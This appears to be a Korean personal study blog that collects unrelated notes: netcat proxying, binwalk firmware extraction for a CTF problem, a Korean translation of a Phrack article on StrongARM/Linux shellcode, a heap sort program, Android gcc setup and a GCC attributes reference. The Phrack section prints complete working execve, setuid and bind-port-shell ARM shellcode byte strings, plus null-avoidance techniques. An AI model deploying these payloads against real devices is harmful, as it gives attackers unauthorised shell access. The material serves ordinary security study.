2012~Lee sang sup`s Note

Proxying

Another useful behaviour is using netcat as a proxy. Both ports and hosts can be redirected. Look at this example:

nc -l 12345 | nc www.google.com 80

Port 12345 represents the request

This starts a nc server on port 12345 and all the connections get redirected to google.com:80. If a web browser makes a request to nc, the request will be sent to google but the response will not be sent to the web browser. That is because pipes are undirectional. This can be worked around with a named pipe to redirect the input and output.

mkfifo backpipe
nc -l 12345 0<backpipe | nc www.google.com 80 1>backpipe

frimmod kit 도 binwalker 를 잘활용한 모드킷이라고 함.

만능은 아니기 때문에 빈워커의 사용법도 익혀둬야함.

binwalker 사용법 관련 블로그 링크

http://hasu0707.tistory.com/589 // binwalker 사용법에 대한 이야기 

http://hackability.kr/archive/201409 //binwalker 를 이용한 대회 문제 풀이 -> 가장 세세함.

codegate 2014 문제로 보는 biinwalker 사용법 예시

binwalker download : https://github.com/devttys0/binwalk

./configure  && make && make install

root@k1rh4:~/Binwalk# binwalk disk-image

root@k1rh4:~/Binwalk# dd if=./disk-image of=./binary ibs=1 skip=1113088

984064+0 records in

1922+0 records out

984064 bytes (984 kB) copied, 0.513622 s, 1.9 MB/s

root@k1rh4:~/Binwalk# file binary

binary: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=0x0bc06819ef5f9b1c94cbffa944b767cbf442c9aa, not stripped

root@k1rh4:~/Binwalk#

dd 명령

if   =  입력 파일

of  = 출력 파일

ibs = 읽을 바이트 단위

skip =  건너뛸 바이트 수

binwalk를 통해 elf 파일의 위치가 0x10FC00 (1113088)임을 알았기 때문에 위와 같이 실행하면 다음과 같은 elf 파일이 떨어지게 되됨

                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x3a, Phile #0x0a of 0x0e

|=--------------=[ Developing StrongARM/Linux shellcode ]=---------------=|

|=-----------------------------------------------------------------------=|

|=--------------------=[ funkysh <funkysh@sm.pl> ]=----------------------=|

ARMS 소개 

이문서는 강력한 ARM 리눅스 쉘코드작성을 필요로 하는 정보이다.

ARM Architecture

32bit ARM 프로세서는 RISC 구조로 디자인 되어있다.

이의미는 이것은 CISC 보다 instruction을 줄일 수 있다.

줄어든 instruction 세트는 스피드에 최적화 된다. 

예를들어 파이프라이닝이나 hard-wired logic 에서 최적화된다.

또한 instruction 과 주소체제 방식은 모든것을 명확하게 한다.

ARM 은 load/store 구조인데, 이것은 오직 레즈스터에 의해서만 데이터처리가

가능하단 것을 의미한다. 메모리에 직접 데이터를 입출력하는 것은 불가능하다.

메모리 입출력은 load/sotre 의 multiple instructions 과 실행상태의 모든 instruction 로 가능하다. 

명맥하게 모든 instruction은 32비트의 길이를 가진다. (4바이트) 

ARM 은 16개의 32비트 레지스터로 구성되어 있다.이는 R0 ~ R15(pc) 까지 가지게 된다. 간략하게 말해서 13개의 '일반적인 목적' 을가지는 레지스터 r0 - r12 를 가진다.

( r0 - r7은 저장되지 않는 레지스터이고 이것은 32-bit 의 모든 프로세서안에 물리적 레지스터라는 것을 의미한다.

이것들은 특별하게 사용되지는 않는다. 그리고 그것은 자유롭게 일반적인 목적으로 사용될 수 있는 레지스터이다. 

반면에 3개의 특별한 목적의 레지스터가 있다. ( 엄밀히 말하면 15개의 레지스터는 모두 일반적인 레지스터이다) 

r13(sp) - stack pointer

r14(lr) - link register

r15(pc/psr) - program counter / status register

레지스터 r13 은 sp 로 알려저 있고 이는 종종 stack pointer 로 사용된다.

그리고 link register 는 함수나 서브루틴 에 사용된다. 

link register - r14 는 lr 로 불리며, 이는 리턴되는 주소값을 저장한다.

서브루틴 호출이 수행될때 BL instruction 은 r14에 return 주소를 셋팅 시킨다.

그리고 서브루틴에서 돌아올때 r14는 PC 에 다시 복사를 하여 되돌아온다. 

ARM에서의 stack 은 낮은 메모리방향으로 자란다. 그리고 스택포인터는 

마지막 아이템에 씌여지게 된다. 이것을 full desecending stack 이라고 부른다.

예를들어 0x41 과 0x42가 스택에 배치되는 것은 아래와 같다.

      memory address   stack value 

                      +------------+

          0xbffffdfc: | 0x00000041 |

                      +------------+

   sp ->  0xbffffdf8: | 0x00000042 |

                      +------------+

---[  Instruction set

 ARM 위에 작성됨에 따라 다른 RISC CPU들은 모두 고정된 길이의 instruction을 가지게 되었따. 이것은 또한 모든 instruction 은 상태 레지스터가 될수 있다는 것이다.

그래서 상위 4비트 (31-28)는 instruction 이 실행되는 동안 모두 특별한 상태로 사용된다.

Instruction 은 4가지의 class 로 나뉘어 질수 있다.

 - branch instructions

 - load / store instruction

 - data-processing instructions,

 - exception-generating instructions,

 1. Branch instructions

    -------------------

 분기 instruction 에는 2가지 종류가 있다.

 branch:            b  <24 bit signed offset>

 branch with link:  bl <24 bit signed offset>

branch with link 실행 하는것은 다음 instruction의 주소와 함께하는  'lr' 셋팅과 함께 출력된다. 

 2. Data-processing instructions

    ----------------------------

 데이터 처리 instrunction 은 일반적으로 3-주소체제 를 사용한다.

 < op code > < 목적지 > < operand 1 > < operand 2 >

< 목적지 > 는 항상 register 이다.  < operand 1 > 역시 r0~ r15 레지스터중 한개여야만한다. 그리고 < operand 2 > 레지스터 일수도 있지만, shift 된 레지스터나 즉시 적용되는 상수 값일수도 있다. 

 < 예시 >

  -----------------------------+----------------+--------------------+

              addition:   add  | add r1,r1,#65  | set r1 = r1 + 65   |

          substraction:   sub  | sub r1,r1,#65  | set r1 = r1 - 65   |

           logical AND:   and  | and r0,r1,r2   | set r0 = r1 AND r2 |

  logical exclusive OR:   eor  | eor r0,r1,#65  | set r0 = r1 XOR r2 |

            logical OR:   orr  | orr r0,r1,r2   | set r0 = r1 OR r2  |

                  move:   mov  | mov r2,r0      | set r2 = r0        |

 3. Load and store instructions

    ---------------------------

 메모리로부터 적재하는 레지스터 ldr rX , <address >

 예를들어 ldr, r0, [r1 ] 는 r0 와함께 r1의 1word 의 32 비트가 지정된다. 

또한 LDRb intruction 은 합리적으로 8 bit 만을 가져온다. 

  store register in memory:  str rX,  <address>     (store 32 bits)

                             strb rX, <address>    (store 8 bits)

ARM 은 multiple 레지스터의 sotreing / loading 역시 지원한다. 

이것은 최적화 관점에서 봤을때 매우 흥미로운 특징이다.

stm (store multiple registers in memory) 부터 살펴보면 아래와같다.

stm < base register > <stack type>(!), { register list }

 < base register > 은 어떠한 레지스터든 상관없다. 그러나 전형적으로 stack pointer 가 사용된다. 

예를들어 : stmfd sp!, {r0-r3, r6} 은 r0, r1, r2 ,r3 와 r6 에 stack의 값이 저장된다. ( full decending mode dptjsms stm 이후에 fd가 붙는다.) 

stack pointer는 r0 레지스터가 저장된 곳을 가르키게 된다. ( ! 때문 ) 

비슷하게 load of multiple register들도 같은 방식을 사용한다. : ldm 

 4. Exception-generating instructions 

    ---------------------------------

Software interrupt : swi < number > 는 system call로써 사용된다.

여기에 언급된 레지스터들은 완벽하지 않지만 다른 문서를 통해 더 많은것을 알아보길 바란다.

---[  Syscalls

 강력한 ARM 프로세서와 함꼐하는 리눅스에서는 syscall 기반은 0x900000로 옴겨졌다.

이것은 쉘코드를 작성하는데 좋은 움직임은 아니다. 그 이후로 우리는 instruction들의 opcode의 zero byte를 조절해야 한다.

예를들어 exit syscall 의 경우

swi 0x900001   [ 0xef900001 ]

가 되어야한다  ( 무슨말이지?)

여기에 쉘코드를 작성할때 유용한 시스템콜 리스트가 있다.  ( syscall의 return 값을 보통 r0에 저장된다)

       execve:

       ------- 

               r0 = const char *filename

               r1 = char *const argv[]

               r2 = char *const envp[]

      call number = 0x90000b

       setuid:

       ------- 

               r0 = uid_t uid

      call number = 0x900017

         dup2:

         ----- 

               r0 = int oldfd

               r1 = int newfd

      call number = 0x90003f

       socket:

       ------- 

               r0 = 1 (SYS_SOCKET)

               r1 = ptr to int domain, int type, int protocol

      call number = 0x900066 (socketcall)

         bind:

         ----- 

               r0 = 2 (SYS_BIND)

               r1 = ptr to int  sockfd, struct sockaddr *my_addr, 

                    socklen_t addrlen

      call number = 0x900066 (socketcall)

       listen:

       ------- 

               r0 = 4 (SYS_LISTEN)

               r1 = ptr to int s, int backlog

      call number = 0x900066 (socketcall)

       accept:

       ------- 

               r0 = 5 (SYS_ACCEPT)

               r1 = ptr int s,  struct  sockaddr  *addr,

                    socklen_t *addrlen 

      call number = 0x900066 (socketcall)

---[  Common operations 

 Loading high values 

 -------------------

모든 상태와 레지스터 숫자가 32bit word 를 나타내고, op코드역시 32bit 이기때문에, 하나의 instruction 안에 레지스터 속의 높은 값은 즉시 로딩 된다. 

이러한 문제는 'shifting' 이라불리는 특징에 의해 해결 될 수 있게된다.

ARM 어셈블리는 6개의 연상되는 shift type이 존재한다. 

           lsl -  logical shift left

           asl -  arithmetic shift left

           lsr -  logical shift right

           asr -  arithmetic shift right

           ror -  rotate right

           rrx -  rotate right with extend

sfifter 는 data 처리 instruction과 함께 처리될수 있다. 또한 ldl 과 str instruction과도 함께 사용된다. 

예를들어 r0 와 0x900000 를 load 하기 위해 우리는 아래의 명령어를 수행할 수 있다.

         mov   r0, #144           ; 0x90

         mov   r0, r0, lsl #16    ; 0x90 << 16 = 0x900000

 Position independence

 ---------------------

 자신의 코드의 위치를 얻는것은 매우 쉽다. PC 는 일반적인 목적의 레지스터이다.

그리고 심지어 어떠한 순간에서든 32bit 값의 메모리 어디든지 jump 를 할수 있다

예를 들어 아래와 같다. 실행 후 : 

         sub   r0, pc, #4

다음 instruction 은 r0 에 저장된다. 

다른 방법으로는 link 와 함께하는 branch instruction 에서 사용될 수 있다.

         bl    sss

         swi   0x900001

  sss:   mov   r0, lr

지금 r0 의 주소값은 "swi 0x900001" 을 가르키고 있다.

 Loops

 -----

 3번을 반복하는 반복문에 대해서 이야기해보자. 

전형적인 반복문은 아래와같이 구조화 될수 있다.

         mov   r0, #3     <- loop counter

 loop:   ...    

         sub   r0, r0, #1 <- fd = fd -1 

         cmp   r0, #0     <- check if r0 == 0 already

         bne   loop       <- goto loop if no (if Z flag != 1)

이러한 반복은 subs에 의해 최적화 될수 있고 이러한 반복은 Z flag를 셋팅하여

우리가 r0 에 도달했을때 cmp 구문을 종료 시키는데 쓰인다.

         mov   r0, #3

 loop:   ...

         subs  r0, r0, #1

         bne   loop

 Nop instruction

 ---------------

ARM 에서는 "mov r0,r0 " 는 nop 으로 사용된다. 그러나 이것은 null 도 같이 따르게 된다. 그래서 이러한 "중간 생략" instruction 은 취약점을 보여주는 POC 작성때만 써야한다.

         mov   r1, r1    [ 0xe1a01001 ]

---[  Null avoiding

대부분의 r0 레지스터를 사용하는 instruction 은 '0' 이다. 

이는 보통 다른 instruction으로 대체되거나 자체 수정된다. 

예시)

             e3a00041    mov   r0, #65      can be raplaced with:

             e0411001    sub   r1, r1, r1

             e2812041    add   r2, r1, #65

             e1a00112    mov   r0, r2, lsl r1  (r0 = r2 << 0)

 아래의 방법으로 syscall 은 patch 될수 있다.

             e28f1004    add   r1, pc, #4    <- get address of swi

             e0422002    sub   r2, r2, r2    

             e5c12001    strb  r2, [r1, #1]  <- patch 0xff with 0x00

             ef90ff0b    swi   0x90ff0b      <- crippled syscall

 Store/Load multiple also generates 'zero', even if r0 register is not

 used:

             e92d001e    stmfd sp!, {r1, r2, r3, r4}

 In example codes presented in next section I used storing with link

 register:

             e04ee00e    sub   lr, lr, lr

             e92d401e    stmfd sp!, {r1, r2, r3, r4, lr}

---[  Example codes

/*

 * 47 byte StrongARM/Linux execve() shellcode

 * funkysh

 */

char shellcode[]= "\x02\x20\x42\xe0"   /*  sub   r2, r2, r2            */

                  "\x1c\x30\x8f\xe2"   /*  add   r3, pc, #28 (0x1c)    */

                  "\x04\x30\x8d\xe5"   /*  str   r3, [sp, #4]          */

                  "\x08\x20\x8d\xe5"   /*  str   r2, [sp, #8]          */

                  "\x13\x02\xa0\xe1"   /*  mov   r0, r3, lsl r2        */

                  "\x07\x20\xc3\xe5"   /*  strb  r2, [r3, #7           */

                  "\x04\x30\x8f\xe2"   /*  add   r3, pc, #4            */

                  "\x04\x10\x8d\xe2"   /*  add   r1, sp, #4            */

                  "\x01\x20\xc3\xe5"   /*  strb  r2, [r3, #1]          */

                  "\x0b\x0b\x90\xef"   /*  swi   0x90ff0b              */

                  "/bin/sh";

/*

 * 20 byte StrongARM/Linux setuid() shellcode

 * funkysh

 */

char shellcode[]= "\x02\x20\x42\xe0"   /*  sub   r2, r2, r2            */

                  "\x04\x10\x8f\xe2"   /*  add   r1, pc, #4            */

                  "\x12\x02\xa0\xe1"   /*  mov   r0, r2, lsl r2        */

                  "\x01\x20\xc1\xe5"   /*  strb  r2, [r1, #1]          */

                  "\x17\x0b\x90\xef";  /*  swi   0x90ff17              */

/*

 * 203 byte StrongARM/Linux bind() portshell shellcode

 * funkysh

 */

char shellcode[]= "\x20\x60\x8f\xe2"   /*  add   r6, pc, #32           */

                  "\x07\x70\x47\xe0"   /*  sub   r7, r7, r7            */

                  "\x01\x70\xc6\xe5"   /*  strb  r7, [r6, #1]          */

                  "\x01\x30\x87\xe2"   /*  add   r3, r7, #1            */

                  "\x13\x07\xa0\xe1"   /*  mov   r0, r3, lsl r7        */

                  "\x01\x20\x83\xe2"   /*  add   r2, r3, #1            */

                  "\x07\x40\xa0\xe1"   /*  mov   r4, r7                */

                  "\x0e\xe0\x4e\xe0"   /*  sub   lr, lr, lr            */

                  "\x1c\x40\x2d\xe9"   /*  stmfd sp!, {r2-r4, lr}      */

                  "\x0d\x10\xa0\xe1"   /*  mov   r1, sp                */

                  "\x66\xff\x90\xef"   /*  swi   0x90ff66     (socket) */

                  "\x10\x57\xa0\xe1"   /*  mov   r5, r0, lsl r7        */

                  "\x35\x70\xc6\xe5"   /*  strb  r7, [r6, #53]         */

                  "\x14\x20\xa0\xe3"   /*  mov   r2, #20               */

                  "\x82\x28\xa9\xe1"   /*  mov   r2, r2, lsl #17       */

                  "\x02\x20\x82\xe2"   /*  add   r2, r2, #2            */

                  "\x14\x40\x2d\xe9"   /*  stmfd sp!, {r2,r4, lr}      */

                  "\x10\x30\xa0\xe3"   /*  mov   r3, #16               */

                  "\x0d\x20\xa0\xe1"   /*  mov   r2, sp                */

                  "\x0d\x40\x2d\xe9"   /*  stmfd sp!, {r0, r2, r3, lr} */

                  "\x02\x20\xa0\xe3"   /*  mov   r2, #2                */

                  "\x12\x07\xa0\xe1"   /*  mov   r0, r2, lsl r7        */

                  "\x0d\x10\xa0\xe1"   /*  mov   r1, sp                */

                  "\x66\xff\x90\xef"   /*  swi   0x90ff66       (bind) */

                  "\x45\x70\xc6\xe5"   /*  strb  r7, [r6, #69]         */

                  "\x02\x20\x82\xe2"   /*  add   r2, r2, #2            */

                  "\x12\x07\xa0\xe1"   /*  mov   r0, r2, lsl r7        */

                  "\x66\xff\x90\xef"   /*  swi   0x90ff66     (listen) */

                  "\x5d\x70\xc6\xe5"   /*  strb  r7, [r6, #93]         */

                  "\x01\x20\x82\xe2"   /*  add   r2, r2, #1            */

                  "\x12\x07\xa0\xe1"   /*  mov   r0, r2, lsl r7        */

                  "\x04\x70\x8d\xe5"   /*  str   r7, [sp, #4]          */

                  "\x08\x70\x8d\xe5"   /*  str r7, [sp, #8]          */

                  "\x66\xff\x90\xef"   /*  swi   0x90ff66     (accept) */

                  "\x10\x57\xa0\xe1"   /*  mov   r5, r0, lsl r7        */

                  "\x02\x10\xa0\xe3"   /*  mov   r1, #2                */

                  "\x71\x70\xc6\xe5"   /*  strb  r7, [r6, #113]        */

                  "\x15\x07\xa0\xe1"   /*  mov   r0, r5, lsl r7 <dup2> */

                  "\x3f\xff\x90\xef"   /*  swi   0x90ff3f       (dup2) */

                  "\x01\x10\x51\xe2"   /*  subs  r1, r1, #1            */

                  "\xfb\xff\xff\x5a"   /*  bpl   <dup2>                */

                  "\x99\x70\xc6\xe5"   /*  strb  r7, [r6, #153]        */

                  "\x14\x30\x8f\xe2"   /*  add   r3, pc, #20           */

                  "\x04\x30\x8d\xe5"   /*  str r3, [sp, #4]          */

                  "\x04\x10\x8d\xe2"   /*  add   r1, sp, #4            */

                  "\x02\x20\x42\xe0"   /*  sub   r2, r2, r2            */

                  "\x13\x02\xa0\xe1"   /*  mov   r0, r3, lsl r2        */

                  "\x08\x20\x8d\xe5"   /*  str   r2, [sp, #8]          */

                  "\x0b\xff\x90\xef"   /*  swi 0x900ff0b    (execve) */

                  "/bin/sh";

힙소팅 정리한 소스 heap sorting sorce 

#include <stdio.h>

#include <stdlib.h>

#include <time.h>

#define SIZE 10                    // 배열 사이즈 정의

void create_random_data( int heap_array[], int size );

void display( int array[],int size );

void reverse_display( int array[], int size );

void create_heap_tree( int heap_array[] , int size );

void swap( int heap_array[], int index );

void heap_sorting( int heap_array[], int sort_array[] , int size );

int swap_sort( int heap_array[] , int size );

int min( int a , int b );

void main() {

clock_t start,finish;                       

int heap_array[SIZE];

int sort_array[SIZE];

/*random create */

printf("<< Random Data >>\n");

create_random_data(heap_array,SIZE);  //랜덤 데이타 생성

display(heap_array,SIZE);     

create_heap_tree(heap_array,SIZE);   //힙 트리 생성

printf("\n<< Create_heap_tree Data >>\n");

display(heap_array,SIZE);

heap_sorting(heap_array,sort_array,SIZE);   //힙 소팅 함수 호출

printf("\n<< Sorted Data >>\n");

display(sort_array,SIZE);

printf("\n<< Reverse Sorted Data >>\n");

reverse_display(sort_array,SIZE);

printf("\n");

}

void create_random_data(int heap_array[], int size) {

int i;

for(i=0 ; i<size ; i++)

heap_array[i] = rand()%size*3;

}

////////////////////////////////////////////////////////////////

//함수명 : display

//용도      : 배열을 출력한다.

//매개변수  : 배열 포인터,배열 사이즈

//리턴값    : 출력시간(정수)

void display(int array[], int size) {

int i;

for(i=0 ; i<size ; i++)

printf("%d ",array[i]);

printf("\n");

}

void reverse_display(int array[], int size) {

int i;

for(i=size-1 ; i>=0 ; i--)

printf("%d ",array[i]);

}

void create_heap_tree(int heap_array[], int size) {

int i;

for(i=1 ; i<size ; i++)

swap(heap_array,i);

}

/*create Heap 에 사용 되며, 상위 노드가 하위 노드보다는 반드시 작도록 배치한다.*/

void swap(int heap_array[], int index) {

int temp;

int swap_flag = 1;

while(swap_flag && index != 0) {    //루트 이거나 swap이 일어나지 않으면 종료

swap_flag = 0;     //swap을 감시하는 플래그

//index%2 == 1 이면 좌측 자식이다 (현재가 자식이다.. 루트이면 그냥 넘어감)

if(index%2 == 1 && heap_array[index] < heap_array[(index-1)/2]) {

heap_array[index] = heap_array[index] ^ heap_array[(index-1)/2];

heap_array[(index-1)/2] = heap_array[index] ^ heap_array[(index-1)/2];

heap_array[index] = heap_array[index] ^ heap_array[(index-1)/2];

index = (index-1)/2;

swap_flag = 1;

}

//index%2 == 0 이면 우측 자식이다(현재가 자식이다.. 루트이면 그냥 넘어감)

if(index%2 == 0 && heap_array[index] < heap_array[(index-2)/2]) {

heap_array[index] = heap_array[index] ^ heap_array[(index-2)/2];

heap_array[(index-2)/2] = heap_array[index] ^ heap_array[(index-2)/2];

heap_array[index] = heap_array[index] ^ heap_array[(index-2)/2];

index = (index-2)/2;

swap_flag = 1;

}

}

}

/* 힙트리의 배열에서 루트값을 빼내면서 소팅한다 */

void heap_sorting( int heap_array[], int sort_array[], int size ) {

int i = 0;

int heap_array_size;

heap_array_size = size;

for( i=0 ; i<size ; i++ ) {

sort_array[i] = swap_sort( heap_array, heap_array_size );

heap_array_size--; 

}

}

/* 최상위 root가 제일 작도록 소팅함. root 값에 최 하위 값 (상대적으로 큰값)

을 넣고 자식 노드와 비교해가며 정렬함 */

int swap_sort(int heap_array[], int size) {

int sort_value;

int swap_flag = 0;

int i = 0;

/* swap이 발생하지 않거나 인덱스가 size를 초과 하면 종료한다 */

while( swap_flag == 0 && !( ((i*2)+1 >= size-1) && ( (i*2)+2 >=size-1) ) ) {

swap_flag = 1;

///////////////////////////////////////////////////////////////////

// 좌 우 자식중 더 작은값(min함수 호출)과 비교한다

// 작은 값이 없다면.. 리턴! why? 힙소팅 create 부분에서 이미 상위

// 노트가 하위 노드보다는 반드시 작도록 설정 되었기 때문! 

// 좌 우 중 작은쪽이 있다면 작은 쪽의주로 정렬을 해 드러간다.

if( heap_array[i] > min( heap_array[(i*2)+1] , heap_array[(i*2)+2] )) 

{

if(heap_array[(i*2)+1] < heap_array[(i*2)+2]) {

heap_array[i] = heap_array[i] ^ heap_array[(i*2)+1];

heap_array[(i*2)+1] = heap_array[i] ^ heap_array[(i*2)+1];

heap_array[i] = heap_array[i] ^ heap_array[(i*2)+1];

i = (i*2)+1;

}

else {

heap_array[i] = heap_array[i] ^ heap_array[(i*2)+2];

heap_array[(i*2)+2] = heap_array[i] ^ heap_array[(i*2)+2];

heap_array[i] = heap_array[i] ^ heap_array[(i*2)+2];

i = (i*2)+2;

}

swap_flag = 0;

}// end if

}// end while

/* 젤 작은 root 값을 넘겨주고, root는 현트리의 제일 마지막 노드로 교체됨 */

sort_value = heap_array[0];

heap_array[0] = heap_array[size-1]; 

return sort_value;

}

int min(int a, int b) {

if(a < b) return a;

else return b;

}

Android gdb, gcc  파일 

http://codetronik.tistory.com/26  // 다운로드 출처 

// gcc 용량은 너무 커서 7zip 으로 풀어줘야함. 

설치 방법 :

adb shell mkdir /data/local/gcc
adb push android_gcc_r2a.tar.bz2 /data/local/gcc
adb push android_gcc_supplement.tar.bz2 /data/local/gcc
adb push android_R_r1a2.tar.bz2 /data/local/gcc
adb shell
cd /data/local/gcc
tar xjf android_gcc_r2a.tar.bz2
tar xjf android_gcc_supplement.tar.bz2
tar xjf android_R_r1a2.tar.bz2

환경 변수 등록 : bashrc

export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/data/local/gcc/lib
export PATH=$PATH:/data/local/gcc/bin

Declaring Attributes of Functions

In GNU C, you declare certain things about functions called in your program which help the compiler optimize function calls and check your code more carefully.

The keyword __attribute__ allows you to specify special attributes when making a declaration. This keyword is followed by an attribute specification inside double parentheses. The following attributes are currently defined for functions on all targets: noreturn,noinline, always_inline, pure, const, format, format_arg, no_instrument_function, section, constructor, destructor, used, unused, deprecated, weak, malloc, and alias. Several other attributes are defined for functions on particular target systems. Other attributes, includingsection are supported for variables declarations (see Variable Attributes) and for types (see Type Attributes).

You may also specify attributes with __ preceding and following each keyword. This allows you to use them in header files without being concerned about a possible macro of the same name. For example, you may use __noreturn__ instead of noreturn.

See Attribute Syntax, for details of the exact syntax for using attributes.

noreturn

A few standard library functions, such as abort and exit, cannot return. GCC knows this automatically. Some programs define their own functions that never return. You can declare them noreturn to tell the compiler this fact. For example,

          void fatal () __attribute__ ((noreturn));
          
          void
          fatal (...)
          {
            ... /* Print error message. */ ...
            exit (1);
          }
          

The noreturn keyword tells the compiler to assume that fatal cannot return. It can then optimize without regard to what would happen if fatal ever did return. This makes slightly better code. More importantly, it helps avoid spurious warnings of uninitialized variables.

Do not assume that registers saved by the calling function are restored before calling the noreturn function.

It does not make sense for a noreturn function to have a return type other than void.

The attribute noreturn is not implemented in GCC versions earlier than 2.5. An alternative way to declare that a function does not return, which works in the current version and in some older versions, is as follows:

          typedef void voidfn ();
          
          volatile voidfn fatal;
          

noinline

This function attribute prevents a function from being considered for inlining. 

always_inline

Generally, functions are not inlined unless optimization is specified. For functions declared inline, this attribute inlines the function even if no optimization level was specified. 

pure

Many functions have no effects except the return value and their return value depends only on the parameters and/or global variables. Such a function can be subject to common subexpression elimination and loop optimization just as an arithmetic operator would be. These functions should be declared with the attribute pure. For example,

          int square (int) __attribute__ ((pure));
          

says that the hypothetical function square is safe to call fewer times than the program says.

Some of common examples of pure functions are strlen or memcmp. Interesting non-pure functions are functions with infinite loops or those depending on volatile memory or other system resource, that may change between two consecutive calls (such as feof in a multithreading environment).

The attribute pure is not implemented in GCC versions earlier than 2.96. 

const

Many functions do not examine any values except their arguments, and have no effects except the return value. Basically this is just slightly more strict class than the pure attribute above, since function is not allowed to read global memory.

Note that a function that has pointer arguments and examines the data pointed to must not be declared const. Likewise, a function that calls a non-const function usually must not be const. It does not make sense for a const function to return void.

The attribute const is not implemented in GCC versions earlier than 2.5. An alternative way to declare that a function has no side effects, which works in the current version and in some older versions, is as follows:

          typedef int intfn ();
          
          extern const intfn square;
          

This approach does not work in GNU C++ from 2.6.0 on, since the language specifies that the const must be attached to the return value. 

format (archetype, string-index, first-to-check)

The format attribute specifies that a function takes printf, scanf, strftime or strfmon style arguments which should be type-checked against a format string. For example, the declaration:

          extern int
          my_printf (void *my_object, const char *my_format, ...)
                __attribute__ ((format (printf, 2, 3)));
          

causes the compiler to check the arguments in calls to my_printf for consistency with the printf style format string argument my_format.

The parameter archetype determines how the format string is interpreted, and should be printf, scanf, strftime or strfmon. (You can also use __printf__, __scanf__, __strftime__ or __strfmon__.) The parameter string-index specifies which argument is the format string argument (starting from 1), while first-to-check is the number of the first argument to check against the format string. For functions where the arguments are not available to be checked (such as vprintf), specify the third parameter as zero. In this case the compiler only checks the format string for consistency. For strftime formats, the third parameter is required to be zero.

In the example above, the format string (my_format) is the second argument of the function my_print, and the arguments to check start with the third argument, so the correct parameters for the format attribute are 2 and 3.

The format attribute allows you to identify your own functions which take format strings as arguments, so that GCC can check the calls to these functions for errors. The compiler always (unless -ffreestanding is used) checks formats for the standard library functions printf, fprintf, sprintf, scanf, fscanf, sscanf, strftime, vprintf, vfprintf and vsprintf whenever such warnings are requested (using -Wformat), so there is no need to modify the header file stdio.h. In C99 mode, the functions snprintf,vsnprintf, vscanf, vfscanf and vsscanf are also checked. Except in strictly conforming C standard modes, the X/Open function strfmon is also checked as are printf_unlocked and fprintf_unlocked. See Options Controlling C Dialect. 

format_arg (string-index)

The format_arg attribute specifies that a function takes a format string for a printf, scanf, strftime or strfmon style function and modifies it (for example, to translate it into another language), so the result can be passed to a printf, scanf, strftime or strfmonstyle function (with the remaining arguments to the format function the same as they would have been for the unmodified string). For example, the declaration:

          extern char *
          my_dgettext (char *my_domain, const char *my_format)
                __attribute__ ((format_arg (2)));
          

causes the compiler to check the arguments in calls to a printf, scanf, strftime or strfmon type function, whose format string argument is a call to the my_dgettext function, for consistency with the format string argument my_format. If the format_arg attribute had not been specified, all the compiler could tell in such calls to format functions would be that the format string argument is not constant; this would generate a warning when -Wformat-nonliteral is used, but the calls could not be checked without the attribute.

The parameter string-index specifies which argument is the format string argument (starting from 1).

The format-arg attribute allows you to identify your own functions which modify format strings, so that GCC can check the calls to printf, scanf, strftime or strfmon type function whose operands are a call to one of your own function. The compiler always treats gettext, dgettext, and dcgettext in this manner except when strict ISO C support is requested by -ansi or an appropriate -std option, or -ffreestanding is used. See Options Controlling C Dialect. 

no_instrument_function

If -finstrument-functions is given, profiling function calls will be generated at entry and exit of most user-compiled functions. Functions with this attribute will not be so instrumented. 

section ("section-name")

Normally, the compiler places the code it generates in the text section. Sometimes, however, you need additional sections, or you need certain particular functions to appear in special sections. The section attribute specifies that a function lives in a particular section. For example, the declaration:

          extern void foobar (void) __attribute__ ((section ("bar")));
          

puts the function foobar in the bar section.

Some file formats do not support arbitrary sections so the section attribute is not available on all platforms. If you need to map the entire contents of a module to a particular section, consider using the facilities of the linker instead. 

constructor

destructor

The constructor attribute causes the function to be called automatically before execution enters main (). Similarly, the destructor attribute causes the function to be called automatically after main () has completed or exit () has been called. Functions with these attributes are useful for initializing data that will be used implicitly during the execution of the program.

These attributes are not currently implemented for Objective-C. 

unused

This attribute, attached to a function, means that the function is meant to be possibly unused. GCC will not produce a warning for this function. GNU C++ does not currently support this attribute as definitions without parameters are valid in C++. 

used

This attribute, attached to a function, means that code must be emitted for the function even if it appears that the function is not referenced. This is useful, for example, when the function is referenced only in inline assembly. 

deprecated

The deprecated attribute results in a warning if the function is used anywhere in the source file. This is useful when identifying functions that are expected to be removed in a future version of a program. The warning also includes the location of the declaration of the deprecated function, to enable users to easily find further information about why the function is deprecated, or what they should do instead. Note that the warnings only occurs for uses:

          int old_fn () __attribute__ ((deprecated));
          int old_fn ();
          int (*fn_ptr)() = old_fn;
          

results in a warning on line 3 but not line 2.

The deprecated attribute can also be used for variables and types (see Variable Attributes, see Type Attributes.) 

weak

The weak attribute causes the declaration to be emitted as a weak symbol rather than a global. This is primarily useful in defining library functions which can be overridden in user code, though it can also be used with non-function declarations. Weak symbols are supported for ELF targets, and also for a.out targets when using the GNU assembler and linker. 

malloc

The malloc attribute is used to tell the compiler that a function may be treated as if it were the malloc function. The compiler assumes that calls to malloc result in a pointers that cannot alias anything. This will often improve optimization. 

alias ("target")

The alias attribute causes the declaration to be emitted as an alias for another symbol, which must be specified. For instance,

          void __f () { /* do something */; }
          void f () __attribute__ ((weak, alias ("__f")));
          

declares f to be a weak alias for __f. In C++, the mangled name for the target must be used.

Not all target machines support this attribute. 

regparm (number)

On the Intel 386, the regparm attribute causes the compiler to pass up to number integer arguments in registers EAX, EDX, and ECX instead of on the stack. Functions that take a variable number of arguments will continue to be passed all of their arguments on the stack. 

stdcall

On the Intel 386, the stdcall attribute causes the compiler to assume that the called function will pop off the stack space used to pass arguments, unless it takes a variable number of arguments.

The PowerPC compiler for Windows NT currently ignores the stdcall attribute. 

cdecl

On the Intel 386, the cdecl attribute causes the compiler to assume that the calling function will pop off the stack space used to pass arguments. This is useful to override the effects of the -mrtd switch.

The PowerPC compiler for Windows NT currently ignores the cdecl attribute. 

longcall

On the RS/6000 and PowerPC, the longcall attribute causes the compiler to always call the function via a pointer, so that functions which reside further than 64 megabytes (67,108,864 bytes) from the current location can be called. 

long_call/short_call

This attribute allows to specify how to call a particular function on ARM. Both attributes override the -mlong-calls (see ARM Options) command line switch and #pragma long_calls settings. The long_call attribute causes the compiler to always call the function by first loading its address into a register and then using the contents of that register. The short_call attribute always places the offset to the function from the call site into the BL instruction directly. 

dllimport

